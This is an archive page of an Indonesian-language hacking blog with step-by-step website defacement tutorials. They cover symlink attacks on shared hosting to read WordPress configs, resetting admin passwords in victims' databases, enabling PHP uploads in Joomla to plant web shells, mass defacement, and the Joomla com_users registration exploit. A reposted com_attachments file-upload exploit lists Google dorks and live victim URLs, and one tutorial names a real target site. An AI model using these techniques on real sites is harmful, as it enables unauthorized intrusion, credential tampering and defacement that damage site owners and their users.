Latest Updates
Home » Archive for November 2013

Cara Deface Dengan Symlink

   Inilah teknik yang sering digunakan para defacer untuk melakukan aksi deface. Teknik ini yaitu dengan melakukan jumping terhadap web yang 1 server dengan web yang sudah di deface. Jadi ke deface 1, bisa kita deface semua web yang 1 server. Tergantung adanya config pada suatu web yang 1 server itu.



Ok, simak saja langkah - langkah berikut :

1.Upload Symlink nya melalui shell


Dan Symlink Sudah Saya Upload Melalui Shell

2.Buka Alamt Symlink Yang Kamu Upload.
3.Pilih "User & Domain & Symlink" Liat SS dibawah

4.Pilih Target dan Klik "Symlink" liat SS
5.Dan Pilih "wp-config.php" Liat SS

6.Cari Username Dan Password Database nya Liat SS

7.Connect'n Database Yang tadi Ke Shell Agan. Liat SS DiBawah ini


8.Dan Munculah Database namenya.Trus Agan Klik Database nya tersebut.

9.Didalam database nya agan pilih "wp_user"
10.Agan Edit Account Admin nya..Yang Harus Anda Ganti Ialah "Password"
Ingat Password nya harus berupa hash.biar lebih gampang agan encrypt password sesuka agan menggunakan md5 encrypt
http://devil4rt.us/hash.php
11.setelah agan ganti password nya trus agan login melalui admin login



Selamat Mencoba ^_^ 

Posted by Unknown at 03.24, Add Comment
Read more

Cara Deface Dengan Config

 ok saya akan menjelas kan cara deface dengan config ^_^


Bahan-Bahan :

  1. CONFIG
  2. MySQL Interface


Pertama Buka web berisikan Config :)


Config CMS Wordpress

Pilih salah satu Config CMS Wordpres :)
Masukan Username dan Pasword ke My SQL Interface Lalu Login  :)


Pilih Database yang ada di bawah Information_schema  :)


Setelah itu KLIK Wp-user,terus klik DATA
Setelah Itu akan terlihat Seperti Gambar Dibawah ini :D, Klik EDIT 
Lalu ubah passwordnya dengan password kamu, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password disini


Untuk Melihat nama WEBSITE nya Klik Cari Tables Wp-post trus klik DATA :D
untuk Login halaman loginnya CMS wordpress 
http://sitetarget.com/wp-login.php
http://sitetarget.com/path/wp-login.php

Login dan Tinggal Tanam SHELL :D


Config CMS Joomla

Pilih Salah satu Config CMS Joomla 


Utuk mencari User nya tekan  CTRL+F cari var $user kalo password nya cari var $password ,trus klik Login :D


Cari Tables Jos_user TERUS Klik data


Pilih salah satu USER nya terus KLIK edit


Lalu ubah passwordnya dengan password kamu, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password  disini ,KLIK EDIT DATA 


Untuk CMS Joomla halaman loginnya berada:
http://sitetarget.com/administrator
http://sitetarget.com/path/administrator
Tinggal tanam SHELL ^_^
Posted by Unknown at 03.16, Add Comment
Read more

Cara Upload Shell di Joomla

Ada simple trik untuk mengupload shell di cms joomla, mungkin udah banyak yang tahu tentang ini. Sebenarnya memakai aplikasi kayak ninja explorer juga bisa sih, tapi kalau koneksi kita lemot kan agak lumayan merepotkan ,atau kalau gak si admin setting biar tidak ada aplikasi yang boleh di install, nah ini caranya gan, lebih praktis juga loh. Langsung aja lah..

Persiapan pertama sudah ada site joomla yang jadi target, sama siapkan shell/ injector. Kalau semua sudah beres langsung saja kita praktekkan.

jangan lupa kopi + rokok, biar lancar awkakwkakwkawk

1. Kalau sudah masuk di cmsnya kan ada tuh menu-menu atau kotak-kotak dibagian tengah, atau klik site > pilih Global Configuration, kalau udah Pilih System, lihat gambar dibawah ini.


2. Pada bagian Media Settings, Legal Extensions (File Types) kita harus merubah salah satu ekstensi disitu contoh yang bisa kita rubah adalah ODP atau ODG ada juga JPG. Rubahlah jadi PHP, kalau sudah liaht pada bagian Restrict Uploads dan Check MIME Types, kalau default itu di centang ke YES, nah kita rubah lah jadi NO.

Perhatiin pada bagian Legal MIME Types nah pada bagian disitu kan banyak tuh tulisan kayak image/jpeg,image/gif,image dll lah, pilih pada bagian belakang klo gak salah X-ZIP atau yang mana aja terserah pokoknya rubah jadi PHP. Kalau sudah di save then NEXT STEP.


3. Pada langkah nomor 2 kalau berahasil ada tulisan “The Global Configuration details have been updated.” klo gagal “An Error has occurred! Unable to open configuration.php file to write!”.Kalau ternyata gagal, anda bisa melakukan cara lain dengan mengganti source index.php templates dengan source injector kamu.

disini kita ngomongin yang berhasil, kalau berahasil pilih MEDIA MANAGER. Perhatikan pada bagian bawah, Upload file injector atau shell anda. misalkan : shell.php kalau sukses, hasilnya seperti screen shoot dibawah ini..


4. Selanjutnya pemanggilan URL shell nya seperti ini: http://www.site.com/images/shell.php



Kalau kurang jelas komentar aja Sob :D

Posted by Unknown at 03.10, Add Comment
Read more

Joomla Attachments Shell Upload

Joomla Attachments Shell Upload


################################################
# Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability
# Google Dork: inurl:"index.php?option=com_attachments"
# Date: 2013-07-09
# Exploit Author: Stars Hacking Team
# We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der
# Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com
# Vendor Homepage: http://joomla.org
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115
# Tested on: Lin
################################################
#                                       ~> ExpLoit <~
#
# http://target/index.php?option=com_attachments&task=upload
#
# 1. Upload Your File . !
# 2. Find Your File in This Path:
# http://target/attachments/article
# 3. End :P
#
############################################
#                                       ~> DeMo <~
# http://www.iwalkfor*life.com/index.php?option=com_attachments&task=upload
# http://www.iwalk*forlife.com/attachments/article/0/stars.jpg
# ----
# http://www.lgb*sychology2013.com/index.php/en/?option=com_attachments&task=upload
# http://www.sai*s-club.net/index.php?option=com_attachments&task=upload
# http://www.proj*t-establis.eu/index.php?option=com_attachments&task=upload
############################################
# Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX
# iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X
# Fuck All Lammer in Cyber :P
###########################################
Posted by Unknown at 02.53, Add Comment
Read more

Cara Deface Dengan Mass Deface


Assalamualaikum Wr.Wb

Udah lah langsung aja ya gan :)

yang teliti !

 Bahan :
  • Mass Deface ( udah ada di shell X Inject / IDCA / etc )
  • Website yang direktorinya ada domain/web lain.
1. Perhatikan gambar dibawah ini, jika terdapat alamat website lain di dalam gambar yang saya lingkarin itu tandanya bisa di mass deface ^0^

2. Setelah itu pergi ke direktori dimana terdapat website didalamnya 

3. Tuh banyak kan websitenya ? sekarang kita klik " Mass Deface "


4. Keterangan :
Folder : udah biarin aja (kan kita udah di direktorinya)
File Name : nama file yang mau dibikin
Kolom Index Code : Isi dengan script deface kalian ^_^
Setelah itu klik HAJAR !!! 

Dah cuma gitu aja om ^_^ tinggal submit atau show offin deh :P



Selamat mencoba :D
Jika Kalian kurang jelas Bisa bertanya Klik [ disini ] Untuk Bertanya
Posted by Unknown at 02.35, Add Comment
Read more

Cara Deface dengan COM_USER

assalamualaikum wr.wb

saya akan membagi ilmu saya yaitu Cara Menggunakan COM_USER

oke nggak usah panjang lebar lagi langsung aja

Bahan :

1.Dork :
          Inurl:index.php/plugins site:com
          inurl:index.php/using/joomla site:com
          inurl:index.php/using-joomla/extensions/components/content-component/article-category-   list/50-upgraders
          inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery
          inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site
          Inurl:index.php/plugins site:com
          Inurl:index.php/rss=feed site:com

"Copy Dork Tersebut Di www.google.com"

2.Exploit , "yang belum punya download di [ sini ]

Cara :
1. Cari web yang vuln.


Gambar diatas merupakan site Vuln.

Gambar diatas merupakan site "Joomla yang samar-samar".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomlanya."

*Web yang saya namakan "samar-samar" itu bukan berarti sitenya tidak tidak bisa di deface/ tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 5% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

*Pastikan Web yang anda ingin deface adalah web yang vuln. karena web yang vuln 60% nya bisa di deface.
2. Setelah menemukan site yang vuln. masukkan exploit berikut di belakang sitenya
index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://www.ssjuvestabia.it. maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://www.ssjuvestabia.it/index.php?option=com_users&view=registration
3. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.
4 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.
5. Cari kode hidden (dengan ctrl+f )dan cari kode seperti gambar di bawah ini. 
6. Copy code yang di beri kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.
7. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut contoh: http://www.ssjuvestabia.it/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.
*Jangan lupa ganti alamat email dan username nya (terserah kamu )
*Password dibiarkan berbeda

8. Save file tersebut.
9. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )
10. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.
11. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol register yang terdapat di bagian bawah.
11. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)
12. Ganti password tersebut (terserah anda) dan klik register kembali.
13. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.
14. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)
*misal alamat web nya adalah http://www.ssjuvestabia.it/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://www.ssjuvestabia.it/administrator/
15. Setelah itu anda masukkan username dan password, lalu login.
16. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.



NOTE: Jika Kalian Belum Jelas Silahkan Bertanya Klik [ disini ] untuk bertanya
             atau Berkomentar Juga bisa :D

Posted by Unknown at 02.32, Add Comment
Read more
Langganan: Postingan (Atom)